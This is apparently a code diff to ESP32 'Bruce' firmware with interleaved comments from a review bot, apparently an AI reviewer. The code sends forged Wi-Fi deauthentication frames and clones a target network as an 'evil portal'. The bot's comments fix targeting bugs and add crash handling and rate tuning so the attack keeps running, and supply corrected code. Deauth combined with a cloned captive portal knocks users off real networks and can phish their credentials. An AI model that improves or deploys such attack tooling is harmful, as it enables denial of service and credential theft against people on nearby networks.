"display.h" #include "mykeyboard.h" #include "evil_portal.h" +#include "wifi_common.h" /** 
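Review bot: `int tmp=millis();` in this hunk stores an `unsigned long` in an `int`, and its comment promises "one deauth frame each 30ms at least" while the check added further down uses `>20`. Modular arithmetic keeps the subtraction correct after the value goes negative, but `unsigned long last_tx = millis();` states the intent, and the comment should match the threshold actually used, e.g. `// throttle: at most one deauth frame every 20 ms`. startEvilPortal's body begins before this hunk.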
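Review bot: The throttled send `if(!hold_deauth && (millis()-tmp) >20)` in this hunk never consults the `deauth` parameter, so "Clone Portal" (deauth=false) and a plain Evil Portal with no target still transmit whatever the global `deauth_frame` holds every 20 ms — stale bytes from a previous target, or zeros — and the status line reads "Deauth ON" because `hold_deauth` starts false. The toggle below is already gated on `deauth`, so the smallest fix is to initialise the flag from it, `bool hold_deauth = !deauth;` (a context line of the previous hunk), or make the condition `if(deauth && !hold_deauth && (millis()-tmp) > 20)`. Separately, nothing inside `while(1)` breaks out of it as far as the diff shows, so the "Bruce will restart" prompt after the loop looks unreachable without a reset; confirm that `checkSelPress()` or the web handler provides an exit, otherwise an explicit `break` on a dedicated key is needed.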
@@ -45,9 +46,10 @@ wifi_ap_record_t ap_record; ** @brief: Broadcasts deauth frames ***************************************************************************************/ void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){ - Serial.begin(115200); - ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, sizeof(&frame_buffer), false)); - Serial.println(" -> Sent deauth frame"); + //Serial.begin(115200); + ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false)); + //Serial.println(" -> Sent deauth frame"); + delay(5); } @@ -73,8 +75,9 @@ void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan ** function: wifi_atk_info ** @brief: Open Wifi information screen ***************************************************************************************/ -void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void wifi_atk_info(String tssid,String mac, uint8_t channel) { //desenhar a tela + drawMainMenu(); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); @@ -90,7 +93,7 @@ void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { delay(300); while(!checkSelPress()) { while(!checkSelPress()) { yield(); } // timerless debounce - target_atk_menu(bssid, tssid, mac, channel); + target_atk_menu(tssid, mac, channel); returnToMenu=true; break; } @@ -109,8 +112,12 @@ void wifi_atk_menu() { nets=WiFi.scanNetworks(); options = { }; for(int i=0; i(WiFi.encryptionType(i))); }}); + //criar o frame + memcpy(ap_record.bssid, WiFi.BSSID(i), 6); + uint8_t chan = static_cast(WiFi.channel(i)); + options.push_back({WiFi.SSID(i).c_str(), [=]() { target_atk_menu(WiFi.SSID(i).c_str(), WiFi.BSSIDstr(i), chan); }}); } + options.push_back({"Main Menu", [=]() { backToMenu(); }}); delay(200); 
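Review bot: `ESP_ERROR_CHECK(esp_wifi_80211_tx(...))` in the send helper aborts the firmware on any non-ESP_OK return, and this helper is now called in a tight loop from target_atk and every 20 ms from the portal loop; esp_wifi_80211_tx can fail at runtime (for example when the TX path has no room for another frame, or if the sanity check was not actually bypassed), so one transient failure reboots the device mid-attack. Check the result instead and let the caller count drops: `esp_err_t err = esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false); if (err != ESP_OK) Serial.printf("tx failed: %d\n", err);` — returning `err` would let target_atk show failures next to its frames/s counter. The `delay(5)` is what caps the rate near the 200 frames/s in the commit message, so it deserves a comment rather than a bare constant.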
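Review bot: The `memcpy(ap_record.bssid, WiFi.BSSID(i), 6);` added inside the scan loop runs for every network while the menu is being built, not when an entry is chosen, so by the time any option lambda runs the global `ap_record.bssid` holds the BSSID of the last scanned network; `target_atk` and `startEvilPortal` then forge deauth frames from the wrong AP unless the user happened to pick the last one. The copy has to move into the lambda, capturing that iteration's BSSID, as below. The `WiFi.SSID(i)` / `WiFi.BSSIDstr(i)` calls inside the lambda also re-read scan results long after the scan; capturing them as `String` values at loop time avoids depending on the scan list still being live when the option is selected.
```cpp
for(int i=0; i<nets; i++) {
    uint8_t bssid[6];
    memcpy(bssid, WiFi.BSSID(i), 6);
    String ssid = WiFi.SSID(i);
    String mac  = WiFi.BSSIDstr(i);
    uint8_t chan = static_cast<uint8_t>(WiFi.channel(i));
    options.push_back({ssid.c_str(), [=]() {
        memcpy(ap_record.bssid, bssid, 6);   // copy only the AP the user picked
        target_atk_menu(ssid, mac, chan);
    }});
}
```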
@@ -121,11 +128,12 @@ void wifi_atk_menu() { ** function: target_atk_menu ** @brief: Open menu to choose which AP Attack ***************************************************************************************/ -void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void target_atk_menu(String tssid,String mac, uint8_t channel) { options = { - {"Deauth", [=]() { target_atk(bssid, tssid, mac, channel); }}, - {"Clone Portal", [=]() { startEvilPortal(tssid, bssid, channel,false); }}, - {"Deauth+Clone", [=]() { startEvilPortal(tssid, bssid, channel,true); }}, + {"Information", [=]() { wifi_atk_info(tssid, mac, channel); }}, + {"Deauth", [=]() { target_atk(tssid, mac, channel); }}, + {"Clone Portal", [=]() { startEvilPortal(tssid, channel,false); }}, + {"Deauth+Clone", [=]() { startEvilPortal(tssid, channel,true); }}, {"Main Menu", [=]() { backToMenu(); }}, }; @@ -139,13 +147,16 @@ void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { ** function: target_atk ** @brief: Deploy Target deauth ***************************************************************************************/ -void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { +void target_atk(String tssid,String mac, uint8_t channel) { Serial.begin(115200); - //criar o frame - memcpy(ap_record.bssid, bssid, 6); + WiFi.mode(WIFI_AP); - WiFi.softAP(tssid, emptyString, channel, 1, 4, false); + if(!WiFi.softAP(tssid, emptyString, channel, 1, 4, false)) { + displayError("Falha 1"); + while(!checkSelPress()) { yield(); } + } wifiConnected=true; + memcpy(deauth_frame, deauth_frame_default, sizeof(deauth_frame_default)); wsl_bypasser_send_raw_frame(&ap_record,channel); //loop com o ataque mostrando o numero de frames por segundo @@ -155,6 +166,12 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { bool redraw = true; delay(200); checkSelPress(); + + + + + + drawMainMenu(); while(1) { if(redraw) { //desenhar a tela 
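Review bot: In target_atk the new `if(!WiFi.softAP(...)) { displayError("Falha 1"); while(!checkSelPress()) { yield(); } }` only pauses on failure and then falls through into `wifiConnected=true` and the deauth loop with no AP interface up, where the `esp_wifi_80211_tx` on WIFI_IF_AP is likely to fail and, through ESP_ERROR_CHECK, abort the device. Leave the function after the acknowledgement: `while(checkSelPress()) { yield(); } returnToMenu=true; return;`. The user-facing string `"Falha 1"` also says nothing about what failed; `"softAP failed"` (or the project's equivalent wording) would help triage.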
@@ -185,7 +202,7 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { //Pause attack if(checkSelPress()) { displayRedStripe("Deauth Paused",TFT_WHITE,FGCOLOR); - while(checkSelPress()) { yield(); } // timeless debounce + while(checkSelPress()) { delay(50); } // timeless debounce // wait to restart or kick out of the function while(!checkSelPress()) { #ifndef CARDPUTER @@ -194,8 +211,9 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { Keyboard.update(); if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer #endif - } - while(checkSelPress()) { yield(); } // timeless debounce + } + while(checkSelPress()) { delay(50); } // timeless debounce + redraw=true; } // Checks para sair do while #ifndef CARDPUTER @@ -205,6 +223,7 @@ void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer #endif } + wifiDisconnect(); returnToMenu=true; } diff --git a/src/wifi_atks.h b/src/wifi_atks.h index adabf6440..4098c5b62 100644 --- a/src/wifi_atks.h +++ b/src/wifi_atks.h @@ -25,10 +25,10 @@ void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size); */ void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan); -void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel); +void wifi_atk_info(String tssid,String mac, uint8_t channel); void wifi_atk_menu(); -void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel); +void target_atk_menu(String tssid,String mac, uint8_t channel); -void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel); \ No newline at end of file +void target_atk(String tssid,String mac, uint8_t channel); \ No newline at end of file
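Review bot: The `break` inside the pause wait loop in this hunk only leaves the inner `while(!checkSelPress())`; the function then runs the debounce and `redraw=true` and relies on the outer `if(checkPrevPress()) break;` reading the same press a second time. If `checkPrevPress()` reports a fresh edge or the button has been released by then, the attack silently resumes instead of exiting. A local flag makes the intent explicit: `bool leave = false;` before the pause block, `if(checkPrevPress()) { leave = true; break; }` (and the same in the Cardputer ESC branch) inside the wait loop, and `if(leave) break;` right after it. target_atk's body starts before this hunk.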